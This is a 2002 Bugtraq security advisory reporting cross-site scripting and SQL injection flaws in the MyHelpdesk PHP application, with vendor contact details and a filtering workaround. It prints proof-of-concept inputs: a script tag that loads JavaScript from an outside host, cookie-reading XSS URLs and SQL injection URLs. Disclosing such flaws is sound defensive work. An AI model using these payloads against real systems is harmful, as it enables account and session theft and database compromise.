From s_alper@hotmail.com Mon Jun 10 16:56:01 2002 From: Ahmet Sabri ALPER To: bugtraq@securityfocus.com Date: 10 Jun 2002 11:50:47 -0000 Subject: [ARL02-A15] Multiple Security Issues in MyHelpdesk +/--------\-------- ALPER Research Labs ------/--------/+ +/---------\------- Security Advisory -----/---------/+ +/----------\------ ID: ARL02-A15 ----/----------/+ +/-----------\----- salper@olympos.org ---/-----------/+ Advisory Information -------------------- Name : Multiple Security Issues in MyHelpdesk Software Package : MyHelpdesk Vendor Homepage : http://myhelpdesk.sourceforge.net/ Vulnerable Versions: v20020509 and older Platforms : OS Independent, PHP Vulnerability Type : Input Validation Error Vendor Contacted : 01/06/2002 Vendor Replied : 02/06/2002 Prior Problems : N/A Current Version : v20020509 (vulnerable) Summary ------- MyHelpdesk is a PHP/MySQL Helpdesk system based on the OneOrZero Helpdesk but with a different set of features. The system is appropriate for the Support Desk of small organizations. Multiple Cross Site Scripting and SQL injection problems exist within "MyHelpdesk". Details ------- 1. When a support assistant creates a new ticket, the Title and Description input is not filtered for malicious code, therefore they allow Cross Site Scripting attacks, which may provide any supporter, the administrator password if the issue is exploited correctly. Proof-of-concept input for Title and/or Description fields: <script src="http://forum.olympos.org/f.js">Alper</script> 2. Maliciously crafted links from third party sites may allow Cross Site Scripting attacks. This can be accomplished via three different functions of index.php: http://[TARGET]/supporter/index.php?t=tickettime&id=<script>alert (document.cookie)</script> http://[TARGET]/supporter/index.php?t=ticketfiles&id=<script>alert (document.cookie)</script> http://[TARGET]/supporter/index.php?t=updateticketlog&id=<script>alert (document.cookie)</script> 3. Also when any ticket is edited, the update section also is not filtered correctly and may carry malicious code. 4. Three different functions of the "index.php" allows passage of user input directly to the SQL query. This makes it possible for attackers to launch SQL injection attacks. http://[TARGET]/supporter/index.php?t=detailticket&id=root%20me http://[TARGET]/supporter/index.php?t=editticket&id=got%20root http://[TARGET]/supporter/index.php?t=updateticketlog&id=without%20me Solution -------- The vendor stated in his reply that MyHelpDesk was designed for internal use for small organizations, and such issues would not do much harm for internal systems. Workaround; Filter the $id, $title, $description variables for malicious code. Credits ------- Discovered on 01, June, 2002 by Ahmet Sabri ALPER ALPER Research Labs. The ALPER Research Labs. [ARL] workers are freelancer security professionals and WhiteHat hackers. The ARL workers are available for hiring for legal jobs. The ARL also supports Open Software Community, by detecting possible security issues in GPL or any other Public Licensed product. References ---------- Product Web Page: http://myhelpdesk.sourceforge.net/ Olympos: http://www.olympos.org/